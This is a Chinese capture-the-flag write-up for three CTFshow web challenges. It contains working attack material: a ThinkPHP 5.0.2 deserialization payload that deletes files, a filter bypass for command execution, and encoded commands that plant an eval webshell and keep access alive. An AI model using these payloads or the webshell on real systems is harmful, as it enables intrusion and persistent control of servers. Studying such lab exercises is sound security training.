CTFSHOW月饼杯II

web签到

<?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { 判断 YBB 的 MD5 值是否等于 YBB 本身 echo "小伙子不错嘛！！flag给你了：" . $flag; } else { echo "偶吼，带黑阔被窝抓到了！！！！"; } }

MD5绕过以为一个数组绕过可以直接秒掉

这里是弱比较那我们就用科学计数法来绕过

通常我们使用数组绕过，是因为像 MD5这种老函数在处理数组时会返回 NULL。如果两边都是 NULL，则 NULL==NULL成立

hash()函数的特性：与md5()函数不同，hash()函数不支持数组输入。如果你给hash()传入一个数组，它会直接报错或返回false（取决于 PHP 版本），而不会像 MD5()那样产生可利用的 NULL

比较逻辑断裂：即便 hash()返回了 false()，你传入的$_GET["YBB"]却是一个真实的数组 [1]。在 PHP 弱类型比较中,false==array是不成立的

MD5弱比较

eztp

<?php namespace app\index\controller; class Index { public function index($run=[]) { highlight_file(__FILE__); echo '<h1>Welcome to CTFSHOW</h1></br>'; echo 'Powered by PHPthink5.0.2</br>'; echo dirname(__FILE__); 输出当前文件所在目录 if (!empty($run[2])){ 当传了 ?run[2]=xxx 并且不为空时触发 echo 'ZmxhZyBpcyBub3QgaGVyZSBidXQgaXQgaXMgaW4gZmxhZy50eHQ='; } if (!empty($run[1])){ 直接对可控参数进行反序列化 $run[1] 是完全可控的典型的反序列化漏洞入口 unserialize($run[1]); } } // hint:/index/index/backdoor public function backdoor(){ if (!file_exists(dirname(__FILE__).'/../../'."install.lock")){ echo "Try to post CMD arguments".'<br/>'; $data = input('post.'); if (!preg_match('/flag/i',$data['cmd'])){ $cmd = escapeshellarg($data['cmd']); $cmd='cat '.$cmd; echo $cmd; system($cmd); }else{ echo "No No No"; } }else{ echo dirname(__FILE__).'/../../'."install.lock has not been deleted"; } } }

首先解码加密内容

提示 flag 在 flag,txt

通过backdoor得到flag，但需要先删除"install.lock"

根据报错信息，Thinkphp版本为5.0.2

可以利用Thinkphp5.1任意文件删除漏洞

https://blog.csdn.net/weixin_74427106/article/details/134626206

<?php namespace think\process\pipes; 反序列化必须保证类名和命名空间与目标环境完全一致，否则 PHP 找不到这个类 use think\Process; class Pipes{} class Windows extends Pipes{ private $files = []; function __construct(){ $this->files = ["/var/www/html/application/index/controller/../../install.lock"]; 设置要删除的目标路径。你根据之前 dirname(__FILE__) 的提示，精准定位到了 install.lock } } echo urlencode(serialize(New Windows()))."\n"; serialize(New Windows()) 将构造好的对象转换为字符串 ?>

/index.php/index/index/?run[1]=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fvar%2Fwww%2Fhtml%2Fapplication%2Findex%2Fcontroller%2F..%2F..%2Finstall.lock%22%3B%7D%7D

成功删除后访问

cmd=/fl%99ag

%99（一个不可见的非 ASCII 字符）

ThinkPHP 5.0.x 反序列化漏洞 + 任意文件删除 + RCE

不要离开我

<?php // 题目说明： // 想办法维持权限，确定无误后提交check，通过check后，才会生成flag，此前flag不存在 error_reporting(0); highlight_file(__FILE__); $a=$_GET['action']; switch($a){ case 'cmd': eval($_POST['cmd']); break; case 'check': file_get_contents("http://checker/api/check"); 如果 action=check，服务器会向内部的 checker 发起请求 break; default: die('params not validate'); 如果不传 action 或者传的值不是cmd和check，程序直接终止并报错 } params not validate

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>"); 没有编码发现没有反应编码之后成功发送 这个\是为了避免shell被转义 cmd=%66%69%6c%65%5f%70%75%74%5f%63%6f%6e%74%65%6e%74%73%28%22%2f%74%6d%70%2f%69%6e%64%65%78%2e%70%68%70%22%2c%22%3c%3f%70%68%70%20%65%76%61%6c%28%5c%24%5f%50%4f%53%54%5b%27%61%27%5d%29%3b%3f%3e%22%29%3b 看看有没有设置成功

看看有没有设置成功

cmd=system("sleep 10 && php -S 0.0.0.0:80 -t /tmp/"); cmd=%73%79%73%74%65%6d%28%22%73%6c%65%65%70%20%31%30%20%26%26%20%70%68%70%20%2d%53%20%30%2e%30%2e%30%2e%30%3a%38%30%20%2d%74%20%2f%74%6d%70%2f%22%29%3b%0a 然后我们要在10秒之内把?action=check 执行了，check会关闭nginx和php-fpm，由于是www-data权限，⽆法启动nginx和php-fpm，直接启动php内置服务器即可。

check之后光速退出，就可以看到这个页面

权限维持